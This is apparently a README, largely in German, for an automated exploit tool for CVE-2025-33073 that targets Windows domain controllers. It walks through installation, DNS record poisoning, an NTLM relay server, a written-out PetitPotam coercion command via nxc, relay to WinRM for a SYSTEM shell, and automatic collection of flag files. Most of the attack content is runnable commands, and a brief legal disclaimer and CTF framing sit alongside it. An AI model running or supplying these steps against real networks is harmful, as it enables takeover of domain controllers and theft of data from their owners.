
Universal exploitation tool for CVE-2025-33073 targeting Windows Domain Controllers with DNSAdmins privileges and WinRM enabled.

Universelles Exploitationstool für CVE-2025-33073, das Windows-Domänencontroller mit DNSAdmins-Berechtigungen und aktiviertem WinRM angreift.
CVE-2025-33073 ist eine kritische Schwachstelle, die es Angreifern ermöglicht, durch eine Kombination von Folgendem eine SYSTEM-level Codeausführung auf Windows-Domänencontrollern zu erreichen:
Dieses PoC bietet ein universelles, automatisiertes Exploitation-Framework, das mit jeder Domäne, jedem Benutzernamen und jeder CTF-Umgebung kompatibel ist.
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python dependencies
pip3 install impacket netexec
# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# Make exploit executable
chmod +x exploit.sh
# Verify tools installation
./exploit.sh # Will check all dependencies
./exploit.sh
Das Skript wird nach Folgendem fragen:
Terminal 1 – Führen Sie das Exploit aus:
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"
Terminal 2 – Coerce-Befehl ausführen (aus Terminal 1-Ausgabe kopieren):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
Ergebnis:
Das Skript sucht automatisch nach und extrahiert:
*flag*.txt*root*.txt*user*.txtproof.txtGefunden in: C:\Users\*\Desktop\
Alle Ausgaben werden gespeichert in: /0pwn_exploit_<TIMESTAMP>/
relay.log – NTLM-Relay-Server-Ausgabedns.log – DNS-Operationsprotokolleshell_output.log – Shell-Befehle und extrahierte Flags1. DNS-Vergiftung (krbrelayx.dnstool)
└─> DNS-Eintrag ändern/erstellen, der auf Angreifer-IP zeigt
2. NTLM-Relay-Server (ntlmrelayx.py)
└─> Auf eingehende NTLM-Authentifizierung warten
3. Erzwingung (nxc + PetitPotam)
└─> DC zwingen, sich bei Angreifer-IP zu authentifizieren
4. Relay → WinRMS
└─> Authentifizierung zum Ziel-WinRMS weiterleiten
5. SYSTEM-Shell
└─> Befehle als SYSTEM ausführen
6. Automatische Flaggen-Extraktion
└─> Alle Flags suchen und extrahieren
Bearbeiten Sie die Variable LONGHOST in exploit.sh:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
Ändern Sie die Funktion run_shell_commands(), um nach anderen Dateimustern zu suchen:
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
Dieses PoC wird bereitgestellt für:
Unbefugter Zugriff auf Computersysteme ist illegal.
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log auf Fehlernc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands()/0pwn_exploit_1234567890/
├── relay.log # NTLM-Relay-Server-Ausgabe
├── dns.log # DNS-Operationsdetails
└── shell_output.log # Extrahierte Flags & Befehlsausgabe
# Relay-Ereignisse anzeigen
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# Alle Flags extrahieren
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# DNS-Operationen überprüfen
cat /0pwn_exploit_*/dns.log
[Demo & Screenshots] – [Demnächst verfügbar]

0pwn (uziii2208) – Ursprüngliches Konzept & Forschung KI-gestützt – v1.0 Verbesserungen & automatische Flaggen-Extraktion
MIT-Lizenz – Siehe LICENSE-Datei für Details
RECHTLICHER HINWEIS:
Diese Software wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal und strafbar.
Durch die Nutzung dieses Tools stimmen Sie Folgendem zu:
Beiträge willkommen! Bitte reichen Sie Issues und Pull Requests ein.
Bei Problemen, Fragen oder Verbesserungen:
Status: ✅ Getestet & Bestätigt Version: 1.0 (Universal) Zuletzt aktualisiert: 2025